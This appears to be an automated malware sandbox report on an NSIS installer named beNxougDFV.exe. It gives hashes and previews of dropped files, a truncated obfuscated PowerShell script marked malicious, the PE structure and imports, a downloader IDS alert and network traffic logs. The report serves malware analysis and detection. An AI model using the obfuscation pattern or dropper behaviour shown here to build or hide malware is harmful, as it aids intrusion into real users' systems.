                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\Desktop\beNxougDFV.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4096
                                      Entropy (8bit):3.6614996787412575
                                      Encrypted:false
                                      SSDEEP:48:qYGZ0Gtq/oaPybCQ1hsIqXA1AfsgsfbLwGXwaEvRugYy/ImBmrm:wDAoyXAykgEUGAaGRuRm
                                      MD5:245AC30568C8703531FC4E64B321BE16
                                      SHA1:BADD01A31FC2B8CC050A1DC3489FC8F620C450F7
                                      SHA-256:B91763928CE210BFC0A43B0AC1178D68CB95CFAD68439B25B55A53B7AA53B207
                                      SHA-512:9A81F2DE2CC41F6E35498B04B6327ADCFF268523F7B6A9EA9D5CFA1B2CF0425E59A121C99F0A0251C3380886CC058E88DE8A12B17E049D5FD5D7EEB0C956F083
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.............................. ......0#......Rich............................PE..L.....uY...........!......................... ...............................P......................................."..h...l ..<............................@....................................................... ..l............................text...g........................... ..`.rdata..(.... ......................@..@.data...<....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\beNxougDFV.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4096
                                      Entropy (8bit):3.286321681873388
                                      Encrypted:false
                                      SSDEEP:48:qK64n2rZ4vuXXqQr1wH+zL/o0o/X/3MVyjlZSC15gaoFU:5P4ZxKQruHkJwvcVyV4FU
                                      MD5:200E4D67E7A08D4C92F05E31442095FE
                                      SHA1:1D0492FDFB7C0C8799AEA7982DA8B4EFEDE7581B
                                      SHA-256:01D867E3A1F0AEC39A4FF02FE9FAFEFC78D6A12390A0DA8ECBF4E7DA5379E42E
                                      SHA-512:620AB7A94E4EE965C159CC1A5F2ADC2CC6616CFB738EA191EAB404B249D21DD19134A314A21315F4EE2C0A75FD5062D1BF353BB75B877A61171F27F4A87CF995
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L.....uY...........!................i........ ...............................P...................................... "......L ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...x....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\beNxougDFV.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):335979
                                      Entropy (8bit):7.680216708925065
                                      Encrypted:false
                                      SSDEEP:6144:pFnU6YwkPOdnMEuUukgKRSTZT/r8HBMXP0wdzSJxQ26r6flmR:XnU6kPWnnufHTleesAGPQ26GI
                                      MD5:22AB1C8AF9B0182D04C2132E8DA05E20
                                      SHA1:7F8CD8FADB2C237F9BCC49AF0069F393BF4EC00E
                                      SHA-256:FF30CB42A7D88083FF271CCA11B91EA49A068290574FA2A747FAAD2983C67B03
                                      SHA-512:A93FAA646B40E03F93DC949E929F1EFF379297EF955707F54E497795CA761F7F6829EB4F6E9FE5957EE45E7751AD50D7A3B484F4913B6DF6572CAD24905EB4F9
                                      Malicious:false
                                      Preview:.88888..!..........,......u...D..-..?.33........##.................K...GG.....{....U...............}}}.........``...........................llll.......-......................i....,,.....(......??............ffff.DD...................=====.ii...q......$..\....o...BBB........C.......D....&....?.?..............O.....qq..***....................n.O...................X...........R..xxx.a.x..........ww.....>>.......L....................................^^^.__.c..<.5.............x......??.;............................z.'''.........................|........%.....u..............0..<<.......\..................@.............4........G...'............T....................gg......pppppp............ll._.......O......../........................N..............^....^.............z...........F................{{........a.....d...i.rrr........QQQQQQ....a........(......AAA....X..........#.........E.9.@@.....sss..................#......FF.........&...........h...............DDD.......%%.......u......ggg......
                                      Process:C:\Users\user\Desktop\beNxougDFV.exe
                                      File Type:ASCII text, with very long lines (3221), with CRLF, LF line terminators
                                      Category:dropped
                                      Size (bytes):53817
                                      Entropy (8bit):5.3212060511904475
                                      Encrypted:false
                                      SSDEEP:768:c3EX6pD/iqZmFsz70lMj3A/FS5oT1IQVzKqVUdSFGwRpuAjlp1zC5/wnR8wuRS:bKpmBF47EWA1TSiUdFGbzDSwgS
                                      MD5:BCA669516C5BD74FE622F79DF2A9262B
                                      SHA1:DEE0B74C6D95FFB819D47600D9943D8A9836E0EF
                                      SHA-256:FD76BAEB84CA420FA8F967D977808F09F1D73E758B8E6A134C605D6305B9B783
                                      SHA-512:4F7A9E77B711BC39E451D0756DF63A082F4A048DA545F1E781636AEC0281D54191F524BB74A8534EF4A7737EEB1BE0477F01C9EBC2543D5FD0CB3BE7981EEBD1
                                      Malicious:true
                                      Preview:$Predisputantntilogs=$Predisputantrbejdsfrie;..<#Philomusical Asphyxiated Surfende #>..<#Subvermiform Trigges Godteposes Conciliator #>..<#Rumdeleren Lykkeriddere Stenotic Urteagtig Endetarmene Eksporthavne #>..<#Preequity Plakatering Jernhaardt Jenskaders myology Bihulen Complacent #>..<#Jagtlejes Brevkontrol Periodology #>..<#Staalhjelm Vanaheim Haematin Kurvenes Cacodaemon Contraceptive Pasform #>...$Opdagerne = @'.Mormo.Woo b$ Ca,mSRedninPhenoe aryndHydrok.emulkCysteespdert No.e=Inval$ S ngRUkraiuZimbanS rubdR impbArbejuUdbyteVagins Yo ot liniEna.cls rinnUnived adufCranirrdkaaiForldeIdi.tn Hoved SubaeA.pro;Dispe.Re.ogf Lo.tu totanStrb.cfemort Sjlei alloBe rinNegat DirigDDistraPengegSskens ti drSemioeStarggErklrnGodkeeHvirvnBlack2S,jki3I fal8In am Dis o( Vk,e$HelhePB,avirDrjdeeKugledkamufiMero sAn lipTerseuChemitAnt raUdestnCounttDisk ,Flint$Re,ulGPrinciAcrinp HarbsCun.iounbulrDi innLandsaPr lom DewaeDistrnDadu,tfilip)V,gra Mode{Felic.Vrest. Fot,$UnskiCdagplrDaa eiUnderm Lin.pA.
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Category:dropped
                                      Size (bytes):525906
                                      Entropy (8bit):7.6577197197827775
                                      Encrypted:false
                                      SSDEEP:12288:SpC1gNvzNkSObzXhVywoTWIuZ1n7JExZ0x1Odt3xD:eC1mxSzXYWIy1nm4MJ
                                      MD5:8A678142D7D4BD32F67A17757CC896A0
                                      SHA1:FA2CA787BBD87D95FBA79851E1ABA0000B9CFD8C
                                      SHA-256:3468B04EEA8016136FE8DC5B259C22CF2088B3FAA4B41F52F54ADE1F0CB5078F
                                      SHA-512:8A18BFED405CD281CA88C77E5B1282AA78374BD925DA48ED20BBAE944F15A7068EA84DF296A6F89AF71E12726BCED059DBE3BEEEDCCFC8D0EE7544B17169F397
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 50%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L...#.uY.................`...........1.......p....@.......................................@.................................(t.......0...W...........................................................................p...............................text....^.......`.................. ..`.rdata..H....p.......d..............@..@.data................x..............@....ndata.......@...........................rsrc....W...0...X...|..............@..@................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      Process:C:\Users\user\Desktop\beNxougDFV.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):134563
                                      Entropy (8bit):1.2420304589895552
                                      Encrypted:false
                                      SSDEEP:768:JTXI/LYa4cD2ujQzIsqIoMEJ8owrALEXMFrDwh0aHlC++KDTvfO/Ky:EnVS+r9brkwN/
                                      MD5:E6066CC79780E021C55CDC3EF8FC82CC
                                      SHA1:FADDF02F672BEA8C3A766FB42F1FDC365934ED50
                                      SHA-256:ED56062F4EA903C040602E4F50BB0F88A5E5DAC8F9F50A608D0495347C1003B8
                                      SHA-512:1F856CE5664BA5BC3914ACE73BDF0F0EBD419A5162890F9E7F66A9878DA9ACDDE9E24A42DDCE4ADAC7014F41F4C54977D9754DC867A9570B6A7BCAB757FC53F7
                                      Malicious:false
                                      Preview:...................................~.................j.....................................................q-....................................................................M................n..O%....H............................4..=......................z..................j.............................................'..............T.M..............!.................................................................................x.....................{..............R..............................................&..........h..............0...............................................................D...................................................................................................................................(..........................................................................E...........`.....=......................n.............................!...g................................#.........................................................................
                                      Process:C:\Users\user\Desktop\beNxougDFV.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):347357
                                      Entropy (8bit):1.2510537828861161
                                      Encrypted:false
                                      SSDEEP:768:7wNmQThgiCB7GJHZUFVJPaSenNvSIpJjRuermO9c3NMRzgJrawa1+VWzoIk33SnI:Agcs7GTR7EvgE
                                      MD5:10C53FA2ADD5E04A7C257241470F8B30
                                      SHA1:F280F7414C749DA2A84EAC4DF1AD18B623325CF8
                                      SHA-256:E27733521BB45F4719C1FFFB5D0D9262E8BAA510C52E7EC880612464E5889685
                                      SHA-512:CF23EA9FB2316C67A1AAA7DCEFD48728F9DBC17E2413867EBFEB443F2EE7CF0BCFCF00F2FAF094A56779FEAE27D14E7408D629E0DF4EF7A8D2CF4FAFA1EBF2D0
                                      Malicious:false
                                      Preview:.........[......*....................................................`..........x.......................................#......A..........................................t....................&.....................y...............................................................................................................................h...............K.........................................................................s......................S.........................n.....`...................................................................................J..a.............;.........................x.....................e.........6.....................?.......................................................U.....c.......................A...........................................................|..............................................=............................L...........p..f.......]..................E................................................................v...
                                      Process:C:\Users\user\Desktop\beNxougDFV.exe
                                      File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 164
                                      Category:dropped
                                      Size (bytes):4242
                                      Entropy (8bit):1.1689000520156396
                                      Encrypted:false
                                      SSDEEP:24:3X9EQjC0f2xlR8XA8f+6mqZVN//sTqYiegGDXMTTO1zlvyQ:nbpexne/+UfNXsNiSCTOPvh
                                      MD5:7F09DBB1E7A421C1C43B98C594A1F1EE
                                      SHA1:5E541763EFD79D7005668B908BE438412E042CBD
                                      SHA-256:20F7314F0A64579C20FFBAC8DE67F9D36FD4824F5C64DC01D89F5FF4908BCDC5
                                      SHA-512:B901933CD173EDC42828FCC6CCA5B4A4BC29FD0F0ADD0AE08BE56BBF1D24781C542C8CE99142069287C976F6E8059D5ACD95FEA8D54427D9B02F74765352AAF5
                                      Malicious:false
                                      Preview:.......................%............................................................U............W......Z.............;.................Q...........................s.......................................E.............................................z...............................M..........P...................................<........u.............................w................c.........................................I...................................k........?................................}.................$..................'..=2.......G..h...?.....................................................................|................................................ ............hj..............................................-............+...................................R....h.........................._.!....R........................".................................Q&<...............................J........N.......................................d..........................5
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.6577197197827775
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:beNxougDFV.exe
                                      File size:525'906 bytes
                                      MD5:8a678142d7d4bd32f67a17757cc896a0
                                      SHA1:fa2ca787bbd87d95fba79851e1aba0000b9cfd8c
                                      SHA256:3468b04eea8016136fe8dc5b259c22cf2088b3faa4b41f52f54ade1f0cb5078f
                                      SHA512:8a18bfed405cd281ca88c77e5b1282aa78374bd925da48ed20bbae944f15a7068ea84df296a6f89af71e12726bced059dbe3beeedccfc8d0ee7544b17169f397
                                      SSDEEP:12288:SpC1gNvzNkSObzXhVywoTWIuZ1n7JExZ0x1Odt3xD:eC1mxSzXYWIy1nm4MJ
                                      TLSH:43B41262F79490E2C83A06B176A3CC312961792E47B162BF279437EE1466373490FE5F
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...#.uY.................`.........
                                      Icon Hash:246445471b4f0f1f
                                      Entrypoint:0x4031bb
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x59759523 [Mon Jul 24 06:35:15 2017 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:3abe302b6d9a1256e6a915429af4ffd2
                                      Instruction
                                      sub esp, 00000184h
                                      push ebx
                                      push esi
                                      push edi
                                      xor ebx, ebx
                                      push 00008001h
                                      mov dword ptr [esp+18h], ebx
                                      mov dword ptr [esp+10h], 00409198h
                                      mov dword ptr [esp+20h], ebx
                                      mov byte ptr [esp+14h], 00000020h
                                      call dword ptr [004070A0h]
                                      call dword ptr [0040709Ch]
                                      and eax, BFFFFFFFh
                                      cmp ax, 00000006h
                                      mov dword ptr [0042370Ch], eax
                                      je 00007F2FCCAF13C3h
                                      push ebx
                                      call 00007F2FCCAF447Ah
                                      cmp eax, ebx
                                      je 00007F2FCCAF13B9h
                                      push 00000C00h
                                      call eax
                                      mov esi, 00407298h
                                      push esi
                                      call 00007F2FCCAF43F6h
                                      push esi
                                      call dword ptr [00407098h]
                                      lea esi, dword ptr [esi+eax+01h]
                                      cmp byte ptr [esi], bl
                                      jne 00007F2FCCAF139Dh
                                      push 0000000Ah
                                      call 00007F2FCCAF444Eh
                                      push 00000008h
                                      call 00007F2FCCAF4447h
                                      push 00000006h
                                      mov dword ptr [00423704h], eax
                                      call 00007F2FCCAF443Bh
                                      cmp eax, ebx
                                      je 00007F2FCCAF13C1h
                                      push 0000001Eh
                                      call eax
                                      test eax, eax
                                      je 00007F2FCCAF13B9h
                                      or byte ptr [0042370Fh], 00000040h
                                      push ebp
                                      call dword ptr [00407044h]
                                      push ebx
                                      call dword ptr [00407288h]
                                      mov dword ptr [004237D8h], eax
                                      push ebx
                                      lea eax, dword ptr [esp+38h]
                                      push 00000160h
                                      push eax
                                      push ebx
                                      push 0041ECC8h
                                      call dword ptr [00407178h]
                                      push 00409188h
                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x330000x15788.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x5ed20x60009112619c91f32f6f8e4096e108712ebeFalse0.6629638671875data6.442176588686321IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x70000x12480x14001c9a524313c13059919ecf8195d205beFalse0.4275390625data5.007650149182371IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x90000x1a8180x400458aeaedc3eabb1f26ec1bbd666017aeFalse0.6396484375data5.13585559284969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata0x240000xf0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x330000x157880x1580040497017b2a1d5e01ad2b917ac12d1ebFalse0.2589821039244186data4.486367209516884IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x332c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.21990713356204897
                                      RT_ICON0x43af00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.35072614107883815
                                      RT_ICON0x460980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.39094746716697937
                                      RT_ICON0x471400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.48811475409836064
                                      RT_ICON0x47ac80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5523049645390071
                                      RT_DIALOG0x47f300x100dataEnglishUnited States0.5234375
                                      RT_DIALOG0x480300x11cdataEnglishUnited States0.6056338028169014
                                      RT_DIALOG0x481500xc4dataEnglishUnited States0.5918367346938775
                                      RT_DIALOG0x482180x60dataEnglishUnited States0.7291666666666666
                                      RT_GROUP_ICON0x482780x4cdataEnglishUnited States0.8157894736842105
                                      RT_VERSION0x482c80x180dataEnglishUnited States0.5859375
                                      RT_MANIFEST0x484480x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                      DLLImport
                                      KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                      USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                      SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                      ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                      COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-12-03T16:42:16.487474+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1049893172.217.19.174443TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 3, 2024 16:42:13.743913889 CET49893443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:13.743974924 CET44349893172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:13.744086981 CET49893443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:13.819861889 CET49893443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:13.819906950 CET44349893172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:15.580040932 CET44349893172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:15.580146074 CET49893443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:15.580926895 CET44349893172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:15.580996037 CET49893443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:15.650480986 CET49893443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:15.650521994 CET44349893172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:15.650881052 CET44349893172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:15.650938988 CET49893443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:15.653364897 CET49893443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:15.695347071 CET44349893172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:16.487474918 CET44349893172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:16.487632036 CET49893443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:16.487663031 CET44349893172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:16.487715960 CET49893443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:16.487793922 CET49893443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:16.487835884 CET44349893172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:16.487884998 CET49893443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:16.646388054 CET49902443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:16.646445036 CET44349902142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:16.646509886 CET49902443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:16.646851063 CET49902443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:16.646863937 CET44349902142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:18.401163101 CET44349902142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:18.401262999 CET49902443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:18.410043001 CET49902443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:18.410057068 CET44349902142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:18.410424948 CET44349902142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:18.410480976 CET49902443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:18.411174059 CET49902443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:18.451333046 CET44349902142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:19.356295109 CET44349902142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:19.356383085 CET49902443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:19.356411934 CET44349902142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:19.356461048 CET49902443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:19.357038021 CET44349902142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:19.357101917 CET49902443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:19.357412100 CET44349902142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:19.357455015 CET44349902142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:19.357484102 CET49902443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:19.357501030 CET49902443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:19.362224102 CET49902443192.168.2.10142.250.181.1
                                      Dec 3, 2024 16:42:19.362241983 CET44349902142.250.181.1192.168.2.10
                                      Dec 3, 2024 16:42:19.480753899 CET49908443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:19.480797052 CET44349908172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:19.480923891 CET49908443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:19.481185913 CET49908443192.168.2.10172.217.19.174
                                      Dec 3, 2024 16:42:19.481199026 CET44349908172.217.19.174192.168.2.10
                                      Dec 3, 2024 16:42:21.271667957 CET44349908172.217.19.174192.168.2.10
